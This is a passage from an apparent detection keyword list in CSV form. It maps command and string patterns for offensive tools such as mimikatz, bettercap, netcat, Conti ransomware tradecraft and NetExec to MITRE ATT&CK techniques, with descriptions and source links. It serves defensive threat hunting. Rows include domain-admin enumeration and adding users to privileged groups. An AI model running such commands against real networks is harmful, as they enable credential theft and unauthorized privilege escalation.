identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*nessuscli fetch*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*nessuscli fix*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*nessus-updates*.tar.gz*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*net domain_controllers*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -"*net group ""Domain Admins"" /domain*",greyware_tool_keyword,net,Query users from domain admins in current domain,T1069.002 - T1087.002,TA0007 - TA0006,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*net group *domain admins* /domain*,offensive_tool_keyword,net,Conti Ransomware Proxyshell PowerShell command #9,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,10,N/A,N/A,N/A,N/A,N/A -*net group *Domain Controllers*/domain*,greyware_tool_keyword,net,Query Domain Comtrollers Computers in the current domain,T1069.002 - T1087.002,TA0007 - TA0006,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*net group *Enterprise Admins* /dom*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*net group / domain *Domain Admins*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*net group /domain *Domain Admins*,greyware_tool_keyword,net,Query users from domain admins in current domain,T1069.002 - T1087.002,TA0007 - TA0006,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*net group administrators /domain*,greyware_tool_keyword,net,showing users in a privileged group. 
,T1069 - T1003,TA0007 - TA0040,N/A,N/A,Discovery,N/A,1,0,greyware tool - risks of False positive !,N/A,10,N/A,N/A,N/A,N/A -*net localgroup admin*,greyware_tool_keyword,net,discover local admins group,T1069.001 - T1087.002,TA0007 - TA0004,N/A,N/A,Discovery,N/A,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*net localgroup administrators icebreaker*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*net rpc group addmem 'Domain admins' *,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*net rpc group members 'Domain admins' -U *,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*net rpc group members 'Domain Users' -W *,greyware_tool_keyword,samba,The net command is one of the new features of Samba-3 and is an attempt to provide a useful tool for the majority of remote management operations necessary for common tasks. 
It is used by attackers to find users list,T1087.002 - T1003.002,TA0007 - TA0006,N/A,N/A,Reconnaissance,https://www.samba.org/samba/docs/old/Samba3-HOWTO/NetCommand.html,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*net start SysUpdate*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*net user /add icebreaker *,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*net user HackMe *,offensive_tool_keyword,win-brute-logon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/win-brute-logon,1,0,N/A,N/A,10,1026,184,2022-12-27T12:06:40Z,2020-05-14T21:46:50Z -*net user john H4x00r123*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM 
relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*net view /all /domain*,greyware_tool_keyword,net,display all domain names on the network,T1016 - T1046,TA0007 - TA0009,N/A,N/A,Discovery,N/A,1,0,N/A,N/A,10,N/A,N/A,N/A,N/A -*net* group Administrator* /add /domain*,greyware_tool_keyword,net,adding a user to a privileged group. This action can be used by adversaries to maintain unauthorized access or escalate privileges within the targeted environment.,T1098,TA0003,N/A,N/A,Persistence,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*net.fuzz *,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*net.fuzz.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*net.probe on,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation 
tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*net.probe on*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*net.sniff *,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*net.sniff.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*net::alias*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net::deleg*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net::group*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net::if*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net::serverinfo*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net::session*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net::share*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net::stats*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net::tod*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net::trust*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net::user*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net::wsession*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*net_dclist *,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*net_localgroup_member -Group*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*net_portscan.py*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*net_recon.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*net1 localgroup admin*,greyware_tool_keyword,net,showing users in a privileged group. ,T1069 - T1003,TA0007 - TA0040,N/A,N/A,Discovery,N/A,1,0,greyware tool - risks of False positive !,N/A,10,N/A,N/A,N/A,N/A -*netCat*,greyware_tool_keyword,netcat,Netcat is a featured networking utility which reads and writes data across network connections,T1043 - T1052 - T1071 - T1095 - T1132 - T1573,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,http://netcat.sourceforge.net/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*net-creds*,offensive_tool_keyword,net-creds,Thoroughly sniff passwords and hashes from an interface or pcap file. 
Concatenates fragmented packets and does not rely on ports for service identification.,T1040 - T1039 - T1036 - T1003,TA0006 - TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/DanMcInerney/net-creds,1,0,N/A,N/A,10,1560,443,2022-03-23T10:40:42Z,2015-01-07T18:47:46Z -*netdiscover -i * -r */24*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*netero1010/Quser-BOF*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF for quser.exe implementation using Windows API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/Quser-BOF,1,1,N/A,10,10,78,10,2023-03-22T17:07:02Z,2021-04-01T15:19:50Z -*netero1010/ScheduleRunner*,offensive_tool_keyword,ScheduleRunner,A C# tool with more flexibility to customize scheduled task for both 
persistence and lateral movement in red team operation,T1210 T1570 T1021 T1550,TA0008,N/A,N/A,Persistence,https://github.com/netero1010/ScheduleRunner,1,1,N/A,N/A,3,299,42,2022-07-05T10:24:45Z,2021-10-12T15:27:32Z -*netero1010/ServiceMove-BOF*,offensive_tool_keyword,cobaltstrike,New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/ServiceMove-BOF,1,1,N/A,10,10,223,45,2022-02-23T07:17:38Z,2021-08-16T07:16:31Z -*NetExec ldap * --*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*NetExec ldap * --dc-ip*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the 
